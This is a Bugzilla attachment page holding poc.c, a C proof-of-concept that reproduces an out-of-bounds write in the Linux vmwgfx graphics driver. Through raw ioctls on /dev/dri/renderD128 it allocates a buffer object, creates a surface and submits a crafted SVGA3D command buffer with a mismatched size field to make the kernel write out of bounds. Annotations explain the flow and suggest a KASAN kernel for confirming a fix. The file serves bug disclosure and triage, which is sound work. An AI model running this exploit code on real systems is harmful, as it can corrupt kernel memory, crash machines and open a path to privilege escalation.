Bugzilla – Attachment 385 Details for
Bug 2070
There is an out-of-bounds write vulnerability in vmwgfx driver
poc
poc.c (text/plain), 3.10 KB, created by
Ezrak1e
on 2022-09-06 14:10:47 UTC
Description:
poc
Filename:
MIME Type:
Creator:
Ezrak1e
Created:
2022-09-06 14:10:47 UTC
Size:
3.10 KB
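/*
 * poc.c - reproducer attached to Bug 2070 ("There is an out-of-bounds write
 * vulnerability in vmwgfx driver").
 *
 * Flow, as visible in this file:
 *   1. open the DRM render node /dev/dri/renderD128
 *   2. allocate a 0x10000-byte buffer object          (ioctl 0xC0186441)
 *   3. create a surface with one 64x64x64 mip level   (ioctl 0xC0306449)
 *   4. submit one command buffer naming both objects  (ioctl 0x4028644C)
 *
 * Every value that reaches the driver (ioctl numbers, command words, sizes)
 * is kept exactly as in the report; only C hygiene was fixed: value returns
 * from void functions, pointer/integer conversions, the memset fill
 * argument, unchecked mmap, and error texts that still said "tun".
 *
 * Triage notes: the only entry point used is the render node, so exposure
 * depends on which accounts may open that device node. The bug title says
 * the effect is an out-of-bounds write in the kernel, which a plain run may
 * not make visible; a KASAN-enabled test kernel is the usual way to confirm
 * it and to verify a fix.
 */
#define _GNU_SOURCE /* MAP_ANONYMOUS / MAP_POPULATE under strict -std=c11 */

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>

#include <linux/if_tun.h>
#include <net/if.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <pthread.h>
#include <sys/socket.h>
#include <stdlib.h>
#include <stdint.h>
#include <netinet/ip.h>
#include <sys/resource.h>
#include <sys/syscall.h>
#include <limits.h>
#include <sys/mman.h>

#include <linux/fs.h>

/* Render-node descriptor shared by all helpers; set to -1 if open() fails. */
int fd = 0;

/* Not referenced anywhere in this file. */
typedef struct mixer
{
    int index;
    int fd;
    char *msg;
} mixer_t;

/*
 * Local copies of the ioctl argument layouts, so the file builds without
 * the driver's uapi header.
 * NOTE(review): presumably these mirror the structures of the same name in
 * the vmwgfx uapi header - confirm. Their sizes (0x30 and 0x28 bytes) match
 * the size fields encoded in the ioctl numbers used below.
 */
struct drm_vmw_surface_create_req {
    __u32 flags;
    __u32 format;
    __u32 mip_levels[6];
    __u64 size_addr;
    __s32 shareable;
    __s32 scanout;
};

struct drm_vmw_execbuf_arg {
    __u64 commands;
    __u32 command_size;
    __u32 throttle_us;
    __u64 fence_rep;
    __u32 version;
    __u32 flags;
    __u32 context_handle;
    __s32 imported_fence_fd;
};

/*
 * Open the render node into the global fd.
 * On failure fd holds -1 and the reason is printed; the caller checks fd.
 */
void init(void)
{
    fd = open("/dev/dri/renderD128", O_RDWR);
    if (fd == -1)
        printf("open /dev/dri/renderD128 failed: %s\n", strerror(errno));
}

/*
 * Submit the single command buffer from the report.
 *
 * handle: buffer-object handle returned by alloc_bo()
 * sid:    surface id returned by create_surface()
 *
 * ioctl 0x4028644C decodes (_IOC layout) as write-only, type 'd', nr 0x4C,
 * size 0x28.
 * NOTE(review): presumably DRM_VMW_EXECBUF (DRM_COMMAND_BASE 0x40 + 12) -
 * confirm against the vmwgfx uapi header.
 */
void poc(int handle, int sid)
{
    /*
     * Locked, pre-faulted scratch mapping. Nothing below passes its address
     * to the driver; it is kept only because the report has it.
     */
    char *vaddr = mmap(NULL,
                       0x2000,
                       PROT_READ | PROT_WRITE,
                       MAP_PRIVATE | MAP_ANONYMOUS | MAP_POPULATE /* important */,
                       -1, 0);
    if (vaddr == MAP_FAILED) {
        printf("mmap failed: %s\n", strerror(errno));
        return;
    }

    /* The report's message says "aborting" but execution continues; kept so. */
    if (mlock((void *)vaddr, 0x2000) == -1) {
        printf("[-] failed to lock memory (%s), aborting!\n",
               strerror(errno));
    }

    memset(vaddr, 'a', 0x2000);

    /*
     * Raw command stream, 32-bit words. Words not assigned stay zero.
     * NOTE(review): word 0 looks like a command id (1044 presumably is
     * SVGA_3D_CMD_SURFACE_DMA) and word 1 the body length in bytes - confirm
     * against the SVGA3D command definitions. Word 12 carries 0x2000 while
     * the surface was created with 64-unit dimensions; that mismatch is
     * presumably what the driver fails to bound - confirm against the bug
     * text and the fix.
     */
    int cmd[0x1000] = {0};
    cmd[0] = 1044;
    cmd[1] = 0x50;
    cmd[2] = handle;
    cmd[3] = 0;
    cmd[5] = sid;
    cmd[6] = 0;
    cmd[7] = 0;
    cmd[12] = 0x2000;
    cmd[13] = 1;
    cmd[14] = 1;
    cmd[19] = 12;

    struct drm_vmw_execbuf_arg arg = {0};
    arg.commands = (__u64)(uintptr_t)cmd; /* user pointer carried in a u64 */
    arg.command_size = 0x100;
    arg.version = 1;

    if (ioctl(fd, 0x4028644C, &arg) == -1)
        printf("execbuf ioctl failed: %s\n", strerror(errno));

    munmap(vaddr, 0x2000);
}

/*
 * Allocate a buffer object and return the third 32-bit word of the reply
 * (presumably the buffer handle), or -1 if the ioctl fails.
 *
 * ioctl 0xC0186441 decodes as read/write, type 'd', nr 0x41, size 0x18.
 * NOTE(review): presumably DRM_VMW_ALLOC_DMABUF (DRM_COMMAND_BASE + 1) -
 * confirm against the vmwgfx uapi header.
 */
int alloc_bo(void)
{
    int arg[0x10] = {0};

    arg[0] = 0x10000; /* first request word; presumably the size in bytes */
    if (ioctl(fd, 0xC0186441, &arg) == -1) {
        printf("alloc buffer ioctl failed: %s\n", strerror(errno));
        return -1;
    }
    return arg[2];
}

/*
 * Create a surface with one mip level whose size entry is 64,64,64 and
 * return the id the driver writes back, or -1 if the ioctl fails.
 *
 * ioctl 0xC0306449 decodes as read/write, type 'd', nr 0x49, size 0x30.
 * NOTE(review): presumably DRM_VMW_CREATE_SURFACE (DRM_COMMAND_BASE + 9);
 * the reply appears to overlay the request, which would be why the id is
 * read back from arg.flags - confirm against the vmwgfx uapi header.
 */
int create_surface(void)
{
    int buf[0x100] = {0};
    buf[0] = 64;
    buf[1] = 64;
    buf[2] = 64;

    struct drm_vmw_surface_create_req arg = {0};
    arg.flags = 0;
    arg.format = 2;
    arg.mip_levels[0] = 1;
    arg.size_addr = (__u64)(uintptr_t)buf; /* user pointer carried in a u64 */
    arg.shareable = 0;
    arg.scanout = 0x10;

    if (ioctl(fd, 0xC0306449, &arg) == -1) {
        printf("create surface ioctl failed: %s\n", strerror(errno));
        return -1;
    }
    return arg.flags;
}

/*
 * Run the steps in order and stop at the first one that fails, instead of
 * carrying a -1 descriptor, handle or surface id into the next call.
 */
int main(int ac, char **argv)
{
    (void)ac;
    (void)argv;

    init();
    if (fd == -1)
        return EXIT_FAILURE;

    int handle = alloc_bo();
    if (handle == -1)
        return EXIT_FAILURE;

    int sid = create_surface();
    if (sid == -1)
        return EXIT_FAILURE;

    printf("%d", sid);
    poc(handle, sid);

    return 0;
}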